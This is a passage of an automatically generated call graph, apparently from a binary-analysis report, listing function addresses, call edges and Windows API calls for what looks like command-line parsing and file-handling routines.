b0ed88 19240->19158 19242 b248f0 GetSystemTime 19241->19242 19243 b248fc 19241->19243 19244 b2493b SystemTimeToFileTime 19242->19244 19243->19244 19245 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 19244->19245 19246 b1bbc7 19245->19246 19246->19168 19248 b087a5 GetLocaleInfoW 19247->19248 19248->19193 19250 b099a0 19249->19250 19272 b099d0 19249->19272 19251 b09a11 6 API calls 19250->19251 19272->19190 19286 b09b1f 19285->19286 19286->19197 19287->19240 19289 b0a9a2 SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 19288->19289 19290 b0a986 19288->19290 19291 b0a9d4 5 API calls 19289->19291 19290->19289 19292 b0a9c5 19291->19292 19292->18789 20234 b0a8e6 20233->20234 20235 b0cc70 549 API calls 20234->20235 20236 b0a8f8 20235->20236 20237 b180ba longjmp 20236->20237 20238 b0a90c 20236->20238 20240 b180c8 20237->20240 20279 b0bab0 20238->20279 20292 b0d660 EnterCriticalSection LeaveCriticalSection 20240->20292 20241 b0a911 20241->18603 20243 b180cd 20243->18603 20245 b0cc7a 20244->20245 20246 b0cf10 548 API calls 20245->20246 20247 b0cc8a 20246->20247 20248 b1d434 longjmp 20247->20248 20249 b0cc9b 20247->20249 20248->20249 20250 b09950 448 API calls 20249->20250 20251 b0ccc4 20249->20251 20252 b1d45b 20250->20252 20251->18600 20254 b28996 20253->20254 20261 b2898e 20253->20261 20255 b289b2 20254->20255 20256 b289a2 20254->20256 20260 b078e4 448 API calls 20255->20260 20255->20261 20257 b078e4 448 API calls 20256->20257 20257->20261 20258 b289db 20258->18602 20259 b289ce longjmp 20259->20258 20260->20261 20261->20258 20261->20259 20277 b287a0 20262->20277 20263 b2892e 20263->18607 20264 b28900 20266 b09950 448 API calls 20264->20266 20265 b28930 20269 b09950 448 API calls 20265->20269 20268 b2890f 20266->20268 20271 b28925 20268->20271 20274 b09950 448 API calls 20268->20274 20269->20263 20270 b288be 20270->20264 20272 b288c3 20270->20272 20844 b2871d 20271->20844 20272->20265 20276 b288d2 20272->20276 20273 b09950 448 API calls 20273->20277 20274->20271 20851 b286e6 20276->20851 20277->20263 20277->20264 20277->20265 20277->20270 20277->20273 20277->20276 20278 b28791 448 API calls 20277->20278 20278->20277 20288 b0bb19 20279->20288 20291 b0bac2 20279->20291 20280 b0baf3 20284 b0bb56 20280->20284 20377 b0ccd0 20280->20377 20281 b0badc _wcsicmp 20281->20280 20283 b0bb68 20281->20283 20283->20280 20286 b0cc70 549 API calls 20283->20286 20284->20241 20285 b0bb15 20285->20241 20286->20283 20287 b0cc70 549 API calls 20287->20288 20288->20287 20289 b0bb48 20288->20289 20288->20291 20289->20284 20290 b0cc70 549 API calls 20289->20290 20290->20291 20291->20280 20291->20281 20293 b0d6b0 20292->20293 20294 b1d587 20293->20294 20296 b0d6c6 EnterCriticalSection LeaveCriticalSection 20293->20296 20301 b0d971 20293->20301 20295 b1d59b 20294->20295 20297 b063bd 448 API calls 20294->20297 20687 b2769e 20295->20687 20299 b0d6f5 _get_osfhandle SetFilePointer AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20296->20299 20300 b1d5a8 20296->20300 20297->20295 20304 b0d752 20299->20304 20720 b29fcf _get_osfhandle GetFileType 20300->20720 20301->20301 20665 b0da30 20301->20665 20305 b0d81c 20304->20305 20309 b1d742 memcmp 20304->20309 20316 b0d774 20304->20316 20311 b0d9f7 GetLastError 20305->20311 20321 b0d82c 20305->20321 20306 b1d5be 20308 b1d6bd 20306->20308 20312 b0dd98 6 API calls 20306->20312 20307 b0d980 20307->20243 20308->20304 20310 b1d6c6 _get_osfhandle 20308->20310 20318 b1d6ef GetLastError 20308->20318 20308->20321 20309->20316 20314 b245f9 10 API calls 20310->20314 20311->20321 20313 b1d5cd 20312->20313 20313->20308 20315 b1d5de 20313->20315 20314->20308 20315->20299 20320 b0dd98 6 API calls 20315->20320 20317 b1d78e AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20316->20317 20319 b0d7b2 20316->20319 20322 b0d7bd SetFilePointer 20316->20322 20317->20319 20327 b0d809 20317->20327 20318->20304 20318->20308 20324 b1d7e9 20319->20324 20325 b0d7ec MultiByteToWideChar 20319->20325 20319->20327 20326 b1d5f2 20320->20326 20331 b0dd98 6 API calls 20321->20331 20347 b0d840 20321->20347 20322->20319 20328 b1d7f0 EnterCriticalSection LeaveCriticalSection longjmp 20324->20328 20325->20327 20329 b1d6b3 20326->20329 20332 b1d607 20326->20332 20327->20305 20327->20328 20328->20321 20329->20299 20330 b0d893 20330->20243 20333 b1d826 20331->20333 20334 b1d610 20332->20334 20335 b1d61f EnterCriticalSection LeaveCriticalSection _get_osfhandle 20332->20335 20338 b29922 448 API calls 20333->20338 20333->20347 20721 b27613 _get_osfhandle 20334->20721 20337 b24191 448 API calls 20335->20337 20339 b1d665 20337->20339 20340 b1d84f longjmp 20338->20340 20339->20311 20341 b1d66d 20339->20341 20340->20347 20341->20321 20344 b1d677 GetLastError 20341->20344 20342 b0d8d7 wcschr 20343 b0d8f6 20342->20343 20342->20347 20351 b0d9e3 20343->20351 20353 b0d904 20343->20353 20345 b1d689 20344->20345 20346 b1d69e 20344->20346 20348 b09950 448 API calls 20345->20348 20349 b09950 448 API calls 20346->20349 20347->20330 20347->20342 20347->20343 20352 b1d68e longjmp 20348->20352 20349->20321 20350 b1d908 20350->20243 20351->20301 20357 b0d9eb 20351->20357 20352->20346 20353->20350 20355 b0dd98 6 API calls 20353->20355 20354 b1d8d3 20356 b078e4 448 API calls 20354->20356 20358 b0d945 20355->20358 20359 b1d8df 20356->20359 20357->20354 20360 b2769e 459 API calls 20357->20360 20375 b1d8af 20357->20375 20358->20301 20362 b0d949 _get_osfhandle SetFilePointer 20358->20362 20363 b1d8fb longjmp 20359->20363 20366 b0dd98 6 API calls 20359->20366 20364 b1d898 20360->20364 20361 b078e4 448 API calls 20365 b1d8be 20361->20365 20362->20301 20373 b1d915 20362->20373 20363->20350 20367 b09950 448 API calls 20364->20367 20368 b29922 448 API calls 20365->20368 20369 b1d8f2 20366->20369 20370 b1d8a2 20367->20370 20371 b1d8c6 longjmp 20368->20371 20369->20363 20726 b2a0da 20369->20726 20372 b09950 448 API calls 20370->20372 20371->20354 20372->20375 20373->20301 20376 b0998d 448 API calls 20373->20376 20375->20361 20376->20301 20378 b0cd14 20377->20378 20379 b0cce9 20377->20379 20420 b0de30 20378->20420 20380 b0ccf5 20379->20380 20381 b0cde8 20379->20381 20384 b0cd01 20380->20384 20385 b0cdf2 20380->20385 20491 b0e090 20381->20491 20387 b0cd12 20384->20387 20417 b0e230 20384->20417 20494 b0e210 20385->20494 20388 b0cddd 20387->20388 20436 b0cf10 _setjmp3 20387->20436 20388->20285 20391 b0cd48 20392 b1d478 longjmp 20391->20392 20393 b0cd59 20391->20393 20394 b1d48f 20392->20394 20393->20394 20399 b0cd85 20393->20399 20395 b09950 448 API calls 20394->20395 20396 b1d49f 20395->20396 20397 b29922 448 API calls 20396->20397 20398 b1d4ac longjmp 20397->20398 20402 b1d4ba 20398->20402 20400 b0ce4a 20399->20400 20403 b0cdd2 20399->20403 20401 b0ce6c 20400->20401 20404 b0cc70 549 API calls 20400->20404 20409 b0ce61 20400->20409 20401->20388 20407 b0dcd0 448 API calls 20401->20407 20405 b09950 448 API calls 20402->20405 20406 b0cf10 548 API calls 20403->20406 20404->20400 20408 b1d4ca 20405->20408 20406->20388 20410 b0ce89 20407->20410 20408->20285 20411 b0cf10 548 API calls 20409->20411 20410->20396 20412 b0ce93 20410->20412 20411->20401 20413 b0cc70 549 API calls 20412->20413 20414 b0ceac 20413->20414 20415 b0bab0 575 API calls 20414->20415 20416 b0cec6 20414->20416 20415->20416 20416->20285 20418 b0ccd0 577 API calls 20417->20418 20419 b0e247 20418->20419 20419->20387 20497 b0ded0 20420->20497 20422 b0de4a 20423 b0de52 20422->20423 20424 b1da16 20422->20424 20515 b0e0b0 20423->20515 20425 b0cc70 549 API calls 20424->20425 20429 b0de57 20425->20429 20427 b0de64 20428 b0cc70 549 API calls 20427->20428 20435 b0de92 20427->20435 20430 b0de75 20428->20430 20429->20427 20432 b28959 449 API calls 20429->20432 20431 b0ded0 555 API calls 20430->20431 20433 b0de80 20431->20433 20432->20427 20434 b0cf10 548 API calls 20433->20434 20433->20435 20434->20435 20435->20387 20437 b1d56e 20436->20437 20441 b0cf38 20436->20441 20438 b0d03b 20439 b0d048 20438->20439 20442 b09950 448 API calls 20438->20442 20439->20391 20440 b0cf9e 20445 b0d600 533 API calls 20440->20445 20441->20437 20441->20438 20441->20440 20449 b0cf86 wcschr 20441->20449 20479 b0d0fa 20441->20479 20660 b0d600 20441->20660 20444 b1d4ca 20442->20444 20444->20391 20447 b0cfb7 20445->20447 20446 b0cf67 iswspace 20446->20441 20448 b1d4d2 20447->20448 20453 b0cfc7 20447->20453 20450 b0d600 533 API calls 20448->20450 20448->20479 20449->20440 20449->20441 20451 b1d4ea 20450->20451 20461 b0d600 533 API calls 20451->20461 20452 b0cfe2 iswdigit 20454 b0cfff 20452->20454 20480 b0d341 20452->20480 20453->20452 20455 b0d0a6 20453->20455 20458 b0d4a7 20453->20458 20453->20479 20462 b0d600 533 API calls 20454->20462 20470 b0d027 20454->20470 20464 b0d0b5 iswspace 20455->20464 20465 b0d0e8 iswdigit 20455->20465 20455->20480 20456 b0d218 20456->20391 20457 b0d190 20457->20456 20460 b078e4 448 API calls 20457->20460 20463 b0d600 533 API calls 20458->20463 20459 b0d600 533 API calls 20459->20480 20460->20437 20461->20480 20466 b0d2a5 20462->20466 20467 b0d4ac 20463->20467 20464->20452 20468 b0d0c7 20464->20468 20469 b0d310 20465->20469 20465->20479 20475 b0d600 533 API calls 20466->20475 20481 b0d2ae 20466->20481 20467->20438 20467->20451 20467->20452 20467->20479 20472 b0d0d0 wcschr 20468->20472 20468->20479 20471 b0d328 iswspace 20469->20471 20469->20480 20470->20391 20476 b0d484 20471->20476 20471->20480 20472->20452 20472->20465 20473 b0d1b4 iswspace 20473->20457 20473->20479 20474 b0d16d iswdigit 20474->20479 20475->20481 20478 b0a62f wcschr 20476->20478 20477 b0d600 533 API calls 20477->20479 20478->20480 20479->20454 20479->20457 20479->20473 20479->20474 20479->20477 20482 b0d23e iswspace 20479->20482 20483 b0d1d1 wcschr 20479->20483 20480->20452 20480->20459 20480->20479 20481->20470 20484 b0d600 533 API calls 20481->20484 20487 b0a62f wcschr 20481->20487 20488 b0d426 iswdigit 20481->20488 20482->20479 20485 b0d253 wcschr 20482->20485 20483->20457 20483->20474 20486 b0d405 iswspace 20484->20486 20485->20479 20486->20481 20487->20481 20488->20470 20489 b0d438 20488->20489 20490 b0d600 533 API calls 20489->20490 20490->20470 20492 b0ccd0 577 API calls 20491->20492 20493 b0e0a7 20492->20493 20493->20387 20495 b0ccd0 577 API calls 20494->20495 20496 b0e227 20495->20496 20496->20387 20504 b0df00 20497->20504 20498 b0df16 iswdigit 20500 b0df27 20498->20500 20498->20504 20499 b0dcd0 448 API calls 20499->20504 20501 b0df2f 20500->20501 20505 b0cf10 548 API calls 20500->20505 20501->20422 20502 b0df63 iswdigit 20502->20504 20503 b1daf9 longjmp 20507 b0e26b 20503->20507 20504->20498 20504->20499 20504->20500 20504->20502 20504->20503 20506 b1daec 20504->20506 20511 b0e059 iswdigit 20504->20511 20512 b28959 449 API calls 20504->20512 20513 b0acb0 448 API calls 20504->20513 20514 b0cc70 549 API calls 20504->20514 20587 b0a931 20504->20587 20505->20501 20508 b28959 449 API calls 20506->20508 20507->20422 20509 b1daf1 20508->20509 20509->20503 20511->20504 20512->20504 20513->20504 20514->20504 20516 b0e0c1 _wcsicmp 20515->20516 20517 b0e15b 20515->20517 20518 b0e203 _wcsicmp 20516->20518 20519 b0e0dc _wcsicmp 20516->20519 20521 b0dcd0 448 API calls 20517->20521 20522 b0e1db 20517->20522 20525 b12a35 20518->20525 20570 b12a63 20518->20570 20519->20518 20523 b0e0f7 _wcsicmp 20519->20523 20526 b0e17d 20521->20526 20527 b28959 449 API calls 20522->20527 20545 b0e1e0 20522->20545 20523->20517 20524 b0e112 _wcsicmp 20523->20524 20524->20517 20528 b0e12d _wcsicmp 20524->20528 20604 b0bb90 20525->20604 20530 b19ca7 20526->20530 20543 b0e187 20526->20543 20531 b0e1f5 20527->20531 20528->20517 20532 b0e144 _wcsicmp 20528->20532 20535 b29922 448 API calls 20530->20535 20531->20429 20532->20517 20533 b12a47 20538 b0cc70 549 API calls 20533->20538 20533->20570 20534 b0e1bf 20537 b0a8c4 563 API calls 20534->20537 20536 b19cac longjmp 20535->20536 20553 b05e22 20536->20553 20541 b0e1c9 20537->20541 20542 b12a5b 20538->20542 20539 b0cc70 549 API calls 20539->20543 20540 b05e1d 20540->20429 20541->20545 20549 b0cc70 549 API calls 20541->20549 20619 b09907 20542->20619 20543->20534 20543->20539 20544 b0e1b4 20543->20544 20548 b0cf10 548 API calls 20544->20548 20545->20429 20547 b05da6 448 API calls 20547->20553 20548->20534 20549->20522 20550 b08f21 448 API calls 20550->20553 20551 b12ae4 20554 b1f500 20551->20554 20555 b12af4 iswspace 20551->20555 20552 b12a7c _wcsicmp 20556 b12a92 _wcsicmp 20552->20556 20552->20570 20553->20540 20553->20547 20553->20550 20560 b05e61 20553->20560 20558 b28959 449 API calls 20554->20558 20555->20554 20557 b12b0b 20555->20557 20559 b12aa8 _wcsicmp 20556->20559 20556->20570 20564 b0a62f wcschr 20557->20564 20565 b12b81 20558->20565 20566 b12abe _wcsicmp 20559->20566 20559->20570 20561 b28c50 448 API calls 20560->20561 20576 b05e68 20561->20576 20562 b0dcd0 448 API calls 20562->20570 20563 b0cc70 549 API calls 20563->20570 20567 b12b1f 20564->20567 20569 b28959 449 API calls 20565->20569 20586 b12b8c 20565->20586 20566->20570 20575 b12ad7 20566->20575 20567->20554 20572 b12b34 20567->20572 20568 b1f4d2 20571 b29922 448 API calls 20568->20571 20573 b1f50f 20569->20573 20570->20551 20570->20552 20570->20562 20570->20563 20570->20568 20578 b28959 449 API calls 20570->20578 20574 b1f4d7 longjmp 20571->20574 20626 b12c23 20572->20626 20573->20573 20574->20575 20575->20551 20580 b28959 449 API calls 20575->20580 20576->20429 20578->20570 20579 b12b4b 20630 b133ca 20579->20630 20580->20551 20586->20429 20588 b0cc70 549 API calls 20587->20588 20589 b0a93b 20588->20589 20590 b0a942 20589->20590 20592 b28959 449 API calls 20589->20592 20591 b0dcd0 448 API calls 20590->20591 20593 b0a94f 20590->20593 20591->20593 20592->20590 20594 b0a959 20593->20594 20595 b29922 448 API calls 20593->20595 20594->20504 20596 b19cac longjmp 20595->20596 20600 b05e22 20596->20600 20597 b05e1d 20597->20504 20598 b05da6 448 API calls 20598->20600 20599 b08f21 448 API calls 20599->20600 20600->20597 20600->20598 20600->20599 20601 b05e61 20600->20601 20602 b28c50 448 API calls 20601->20602 20603 b05e68 20602->20603 20603->20504 20605 b0dcd0 448 API calls 20604->20605 20606 b0bba1 20605->20606 20607 b0dcd0 448 API calls 20606->20607 20612 b0bbc1 20606->20612 20607->20612 20608 b29922 448 API calls 20609 b19cac longjmp 20608->20609 20610 b05e22 20609->20610 20611 b05e1d 20610->20611 20614 b05da6 448 API calls 20610->20614 20615 b08f21 448 API calls 20610->20615 20616 b05e61 20610->20616 20611->20533 20612->20608 20613 b0bbde 20612->20613 20613->20533 20614->20610 20615->20610 20617 b28c50 448 API calls 20616->20617 20618 b05e68 20617->20618 20618->20533 20620 b0bc30 448 API calls 20619->20620 20621 b09938 20620->20621 20650 b0a800 20621->20650 20624 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20625 b0994e 20624->20625 20625->20570 20627 b0cc70 549 API calls 20626->20627 20628 b12c2f _wcsicmp 20627->20628 20629 b12c41 20628->20629 20629->20579 20631 b0cc70 549 API calls 20630->20631 20632 b133e2 20631->20632 20633 b1f776 20632->20633 20637 b133eb 20632->20637 20634 b28959 449 API calls 20633->20634 20635 b1f77b 20634->20635 20636 b0cc70 549 API calls 20636->20637 20637->20635 20637->20636 20639 b13457 20637->20639 20642 b0dcd0 448 API calls 20637->20642 20643 b0dd20 448 API calls 20637->20643 20644 b1f78c 20637->20644 20642->20637 20643->20637 20651 b0a82f 20650->20651 20652 b09943 20650->20652 20651->20652 20653 b29a0e 449 API calls 20651->20653 20652->20624 20654 b1c971 20653->20654 20654->20652 20655 b063bd 448 API calls 20654->20655 20661 b0d613 20660->20661 20662 b0d660 533 API calls 20661->20662 20663 b0d627 20661->20663 20664 b180cd 20662->20664 20663->20446 20664->20446 20666 b0dcd0 448 API calls 20665->20666 20667 b0da45 20666->20667 20668 b0da52 20667->20668 20669 b1d948 memset longjmp 20667->20669 20670 b0da81 20668->20670 20671 b0dad3 20668->20671 20673 b1d9ad 20668->20673 20685 b1d97b memcpy 20668->20685 20734 b0ee03 20668->20734 20785 b0bf70 20668->20785 20669->20670 20670->20307 20672 b0daf1 20671->20672 20671->20673 20674 b0dc60 2 API calls 20672->20674 20675 b078e4 448 API calls 20673->20675 20676 b0daf6 20674->20676 20678 b1d9a8 20675->20678 20676->20307 20680 b0dc60 2 API calls 20678->20680 20681 b1d9cc longjmp 20680->20681 20682 b1d9da 20681->20682 20683 b078e4 448 API calls 20682->20683 20684 b1d9e3 20683->20684 20684->20307 20686 b078e4 448 API calls 20685->20686 20686->20678 20688 b27728 20687->20688 20689 b276fd 20687->20689 20691 b27d26 20688->20691 20694 b27746 20688->20694 20696 b09950 448 API calls 20688->20696 20690 b063bd 448 API calls 20689->20690 20693 b27708 EnterCriticalSection LeaveCriticalSection 20690->20693 20692 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20691->20692 20695 b27d3d 20692->20695 20693->20688 20697 b0ec2e 448 API calls 20694->20697 20699 b27750 20694->20699 20695->20300 20696->20694 20697->20699 20698 b08e9e 448 API calls 20700 b277ad 20698->20700 20699->20698 20839 b27654 20700->20839 20703 b27c99 20704 b09abf _vsnwprintf 20703->20704 20705 b27cba 20704->20705 20707 b0998d 448 API calls 20705->20707 20706 b278b8 towupper 20709 b277fa 20706->20709 20708 b27cfe 20707->20708 20708->20691 20710 b27d07 EnterCriticalSection LeaveCriticalSection 20708->20710 20709->20705 20709->20706 20711 b09310 448 API calls 20709->20711 20712 b06854 448 API calls 20709->20712 20713 b09abf _vsnwprintf 20709->20713 20714 b04d08 5 API calls 20709->20714 20715 b27afc GetDriveTypeW 20709->20715 20717 b172ef ApiSetQueryApiSetPresence 20709->20717 20718 b09abf _vsnwprintf 20709->20718 20843 b1640a FormatMessageW 20709->20843 20710->20691 20711->20709 20712->20709 20713->20709 20714->20709 20715->20709 20717->20709 20719 b279ed LocalFree 20718->20719 20719->20709 20720->20306 20722 b24799 448 API calls 20721->20722 20723 b2763c 20722->20723 20724 b27649 GetLastError 20723->20724 20725 b27645 20723->20725 20724->20725 20725->20321 20727 b2a0ef GetStdHandle 20726->20727 20728 b24799 448 API calls 20727->20728 20729 b2a110 20728->20729 20730 b2a114 wcschr 20729->20730 20731 b2a129 20729->20731 20730->20727 20730->20731 20732 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20731->20732 20733 b2a133 20732->20733 20733->20363 20735 b0ee52 20734->20735 20736 b0ee4c 20734->20736 20738 b0ee5a wcsrchr 20735->20738 20740 b0ee68 20735->20740 20736->20735 20737 b0eea7 20736->20737 20741 b11a05 5 API calls 20737->20741 20744 b1de31 20737->20744 20738->20740 20739 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20742 b0ee88 20739->20742 20740->20739 20770 b0eed8 20741->20770 20742->20668 20743 b1df50 longjmp 20743->20744 20744->20740 20744->20743 20745 b1de49 ??_V@YAXPAX 20744->20745 20758 b1decb 20744->20758 20745->20740 20746 b0ef50 wcsrchr 20749 b0ef67 wcsrchr 20746->20749 20746->20770 20747 b1de80 wcschr 20750 b1df01 20747->20750 20751 b1de9e 20747->20751 20748 b0ef09 towlower wcsrchr 20752 b0f1dd wcsrchr 20748->20752 20748->20770 20749->20750 20749->20770 20750->20745 20755 b078e4 448 API calls 20750->20755 20754 b0dcd0 448 API calls 20751->20754 20753 b0f1f7 towlower 20752->20753 20752->20770 20753->20770 20759 b1deb5 20754->20759 20755->20744 20756 b0acb0 448 API calls 20756->20770 20757 b0efed 20757->20740 20760 b0efef ??_V@YAXPAX 20757->20760 20758->20745 20759->20744 20808 b11d90 20759->20808 20760->20740 20762 b0efe6 20765 b0acb0 448 API calls 20762->20765 20763 b0f009 GetFullPathNameW 20763->20770 20765->20757 20766 b0dc60 2 API calls 20766->20750 20767 b1df72 SearchPathW 20767->20770 20768 b10207 10 API calls 20769 b0f03d wcsrchr 20768->20769 20769->20770 20771 b1dfb9 wcsrchr 20769->20771 20770->20744 20770->20745 20770->20746 20770->20747 20770->20748 20770->20750 20770->20756 20770->20757 20770->20762 20770->20763 20770->20767 20770->20768 20770->20771 20772 b0f067 memset 20770->20772 20774 b1dff6 GetFileAttributesExW 20770->20774 20776 b1e07c FileTimeToSystemTime 20770->20776 20779 b0f18a 20770->20779 20781 b06854 448 API calls 20770->20781 20783 b0f164 wcsrchr 20770->20783 20784 b09310 448 API calls 20770->20784 20821 b2b325 20770->20821 20771->20770 20773 b0e3f0 17 API calls 20772->20773 20773->20770 20774->20770 20775 b1e271 20776->20770 20777 b0acb0 448 API calls 20778 b0f1ba 20777->20778 20778->20757 20780 b0f1c8 ??_V@YAXPAX 20778->20780 20779->20775 20779->20777 20780->20757 20781->20770 20783->20770 20783->20775 20784->20770 20786 b0dcd0 448 API calls 20785->20786 20789 b0bfc8 20786->20789 20787 b1cfad longjmp 20796 b0c02c 20787->20796 20788 b1cfc1 longjmp 20788->20796 20790 b0dcd0 448 API calls 20789->20790 20789->20796 20807 b0c155 20789->20807 20790->20796 20791 b0ec2e 448 API calls 20791->20796 20794 b0c1ef wcstol 20794->20796 20795 b0c111 20797 b1d029 20795->20797 20795->20807 20796->20787 20796->20788 20796->20791 20796->20794 20796->20795 20804 b0c26d 20796->20804 20806 b0c0bf 20796->20806 20796->20807 20800 b078e4 448 API calls 20797->20800 20798 b1d042 memcpy 20801 b1d063 20798->20801 20799 b0c333 memcpy 20802 b0c1b2 _wcsnicmp 20799->20802 20803 b1d036 longjmp 20800->20803 20802->20807 20803->20798 20805 b0c27d wcstol 20804->20805 20804->20807 20805->20807 20834 b0c3f4 20806->20834 20807->20798 20807->20799 20807->20802 20807->20806 20809 b11e5a 20808->20809 20810 b11da8 20808->20810 20809->20766 20810->20809 20829 b0ab7f 20810->20829 20813 b0acb0 448 API calls 20814 b11dc2 20813->20814 20815 b101f5 wcsrchr 20814->20815 20820 b11dd1 20815->20820 20816 b1f106 20817 b11e4a 20819 b0dc60 2 API calls 20817->20819 20818 b11e11 _wcsnicmp 20818->20820 20819->20809 20820->20816 20820->20817 20820->20818 20820->20820 20824 b2b35b __aulldvrm 20821->20824 20822 b2b42e 20823 b2b445 wcsncmp 20822->20823 20826 b2b432 20822->20826 20823->20826 20824->20822 20825 b2b3f4 memmove 20824->20825 20825->20824 20827 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20826->20827 20828 b2b4f8 20827->20828 20828->20770 20830 b0abaa 20829->20830 20833 b0ab88 20829->20833 20830->20813 20831 b0ab89 iswspace 20832 b0ab98 wcschr 20831->20832 20831->20833 20832->20830 20832->20833 20833->20830 20833->20831 20833->20832 20835 b0dc60 2 API calls 20834->20835 20836 b0c3fb 20835->20836 20837 b0dc60 2 API calls 20836->20837 20838 b0c0df 20837->20838 20838->20668 20840 b27660 20839->20840 20841 b27679 20839->20841 20842 b16e25 4 API calls 20840->20842 20841->20691 20841->20703 20841->20709 20842->20841 20843->20709 20845 b28727 20844->20845 20850 b28781 20844->20850 20846 b0998d 448 API calls 20845->20846 20848 b28736 20846->20848 20847 b09950 448 API calls 20847->20848 20848->20847 20849 b0998d 448 API calls 20848->20849 20848->20850 20849->20848 20852 b09950 448 API calls 20851->20852 20853 b286f9 20852->20853 20854 b2871d 448 API calls 20853->20854 20855 b28702 20854->20855 20856 b28791 448 API calls 20855->20856 20857 b2870d 20856->20857 20858 b28791 448 API calls 20857->20858 20859 b28718 20858->20859 20859->20263 20861 b0adc6 20860->20861 20865 b1cc3f 20860->20865 20862 b15a2e memset 20861->20862 20864 b0add1 20862->20864 20863 b1cc6a GetLastError 20863->20865 20864->20865 20866 b0e3f0 17 API calls 20864->20866 20865->20863 20867 b078e4 448 API calls 20865->20867 20871 b161e6 ??_V@YAXPAX 20865->20871 20868 b0adef 20866->20868 20867->20865 20868->20865 20869 b0ae05 20868->20869 20870 b0b0b9 20868->20870 21111 b0e950 memset 20869->21111 20873 b10b12 5 API calls 20870->20873 20871->20865 20875 b0b0c1 20873->20875 20875->20865 21240 b07f47 memset 20875->21240 20876 b0ae23 20876->20865 20880 b1cc7c 20876->20880 20888 b0ae44 20876->20888 20877 b0b118 21254 b121ee 20877->21254 20883 b161e6 ??_V@YAXPAX 20880->20883 20882 b0b11f 21258 b12940 20882->21258 20885 b0aea1 20883->20885 20884 b0b0dc towupper 20886 b0b100 20884->20886 20885->20865 20898 b0af6b 20885->20898 20905 b0aecb wcschr 20885->20905 20912 b0b13b 20885->20912 20913 b0b176 20885->20913 20886->20877 20886->20886 20890 b1cc75 20886->20890 20888->20885 20889 b0bc30 448 API calls 20888->20889 20893 b0ae86 20889->20893 20891 b29a7d 448 API calls 20890->20891 20891->20880 20894 b0ae91 20893->20894 20896 b0b00e wcsncmp 20893->20896 20894->20885 20897 b0a800 449 API calls 20894->20897 20896->20885 20896->20894 20897->20885 21140 b0b1b0 20898->21140 20899 b161e6 ??_V@YAXPAX 20901 b0afe8 20899->20901 20903 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20901->20903 20907 b0b002 20903->20907 20904 b10b12 5 API calls 20904->20912 20905->20885 20921 b0b033 20905->20921 20906 b0af83 20909 b0afc4 20906->20909 20910 b0af99 20906->20910 20907->18643 21162 b0aa50 20909->21162 20914 b0afa5 20910->20914 20915 b0b02c 20910->20915 20912->20885 20912->20904 20912->20913 20922 b07f47 23 API calls 20912->20922 20931 b1ccc9 GetLastError 20912->20931 20916 b078e4 448 API calls 20913->20916 20917 b0afb1 20914->20917 20918 b0b085 20914->20918 21172 b0c6c0 20915->21172 20916->20865 20924 b0b0a2 20917->20924 20925 b0afbd 20917->20925 21225 b09dc0 20918->21225 20920 b0b031 20928 b0afc2 20920->20928 20921->20918 20927 b0b193 20921->20927 20922->20912 20924->20882 20929 b0b0aa 20924->20929 21159 b09770 20925->21159 20930 b16c78 4 API calls 20927->20930 21168 b0b17b 20928->21168 21144 b059a0 20929->21144 20930->20913 20931->20913 20934 b0e683 20933->20934 20935 b0e6c6 20933->20935 20934->20935 20936 b0e689 20934->20936 20939 b0e71d 20934->20939 20940 b0e6ec 20934->20940 20945 b0e733 20934->20945 20935->18612 22105 b0e790 20936->22105 20944 b0e790 457 API calls 20939->20944 20940->20935 20943 b0e790 457 API calls 20940->20943 20941 b0e790 457 API calls 20946 b0e6ad 20941->20946 20942 b0e790 457 API calls 20942->20935 20943->20940 20944->20945 20945->20935 20945->20942 20946->20935 20947 b0e790 457 API calls 20946->20947 20947->20946 20950 b103cb 20948->20950 20949 b103e1 20951 b103f3 20949->20951 20952 b10416 20949->20952 20950->20949 20953 b1e7bf iswdigit 20950->20953 22119 b115f0 20951->22119 20958 b103f8 20952->20958 22123 b12960 wcstol wcstol 20952->22123 20953->20950 20955 b1e7e2 20953->20955 20957 b078e4 448 API calls 20955->20957 20959 b1040d 20957->20959 20960 b0e470 917 API calls 20958->20960 20959->18643 20960->20959 20962 b0e470 918 API calls 20961->20962 20963 b0ab63 20962->20963 20964 b0e470 918 API calls 20963->20964 20965 b0ab76 20963->20965 20964->20965 20965->18643 20967 b0e3f0 17 API calls 20966->20967 20976 b09f61 20967->20976 20968 b0a0e7 ??_V@YAXPAX 20969 b0a0ef 20968->20969 20971 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 20969->20971 20970 b09fd7 20973 b0dcd0 448 API calls 20970->20973 20983 b09ff4 20970->20983 20972 b0a0fe 20971->20972 20972->18618 20972->18631 20973->20983 20974 b10060 5 API calls 20974->20976 20976->20970 20976->20974 20977 b0a0d9 20976->20977 20977->20968 20977->20969 20978 b1c376 _get_osfhandle SetFilePointer 20979 b1c392 20978->20979 20978->20983 20982 b09abf _vsnwprintf 20979->20982 20981 b0a02b _get_osfhandle 20981->20983 20984 b0a03d _get_osfhandle 20981->20984 20989 b1c3a9 20982->20989 20983->20977 20983->20978 20983->20981 20985 b0dd98 6 API calls 20983->20985 20986 b0a16c _close 20983->20986 20992 b0a1d6 _dup2 20983->20992 20993 b1c3d3 20983->20993 20994 b10590 19 API calls 20983->20994 20996 b1c40c 20983->20996 20998 b0a11c 20983->20998 21000 b1c4aa 20983->21000 21013 b1c439 20983->21013 22128 b0a1a8 _dup 20983->22128 22130 b29fcf _get_osfhandle GetFileType 20983->22130 20984->20983 20985->20983 20986->20983 20987 b09abf _vsnwprintf 20987->20989 20988 b078e4 448 API calls 20990 b1c463 20988->20990 20989->20988 20991 b0a125 2 API calls 20990->20991 20991->20977 20992->20983 20995 b11d90 451 API calls 